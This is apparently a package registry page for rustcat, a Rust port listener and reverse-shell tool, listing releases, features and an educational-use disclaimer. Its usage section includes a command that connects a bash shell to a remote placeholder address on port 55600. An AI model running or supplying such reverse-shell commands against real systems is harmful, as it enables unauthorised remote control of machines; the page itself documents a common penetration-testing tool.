#shell #reverse #port #listener #modern #macos #networking

app rustcat

The Modern Port Listener and Reverse Shell

12 releases (stable)

3.0.0 Aug 15, 2022
1.3.0 Sep 28, 2021
1.0.1 Aug 7, 2021
0.0.5 Jun 12, 2021

#9 in #listener

Download history 20/week @ 2024-02-26 45/week @ 2024-03-04 5/week @ 2024-03-11

70 downloads per month

GPL-3.0 license

24KB
334 lines

rustcat - The modern port listener and reverse shell

GitHub All Releases AUR version GitHub Issues GitHub Contributors

What is Rustcat

Rustcat is an easy to use port listener and reverse shell for Linux, MacOS, and Windows aimed to be easy to use and accessible.

image

Modes

  • Listen mode (listen);
  • Reverse shell mode (connect);

Featurees

  • Command history & Tab completion (Interactive mode);
  • CTRL-C blocking;
  • Colors;
  • Everything easy;

Installing

Check out the Installation Guide. Or if you want to have it portable, check out the latest release

Usage

The most basic and useful example to start listening on a port would be (you can even run vim inside rustcat with this):

rcat listen -ib 55600

and to connect:

rcat connect -s bash the.0.0.ip 55600

For some more basic usage, check here

Disclaimer

This tool may be used for educational purposes only. Users take full responsibility for any actions performed using this tool. The author accepts no liability for damage caused by this tool. If these terms are not acceptable to you, then do not use this tool.

Dependencies

~7–18MB
~241K SLoC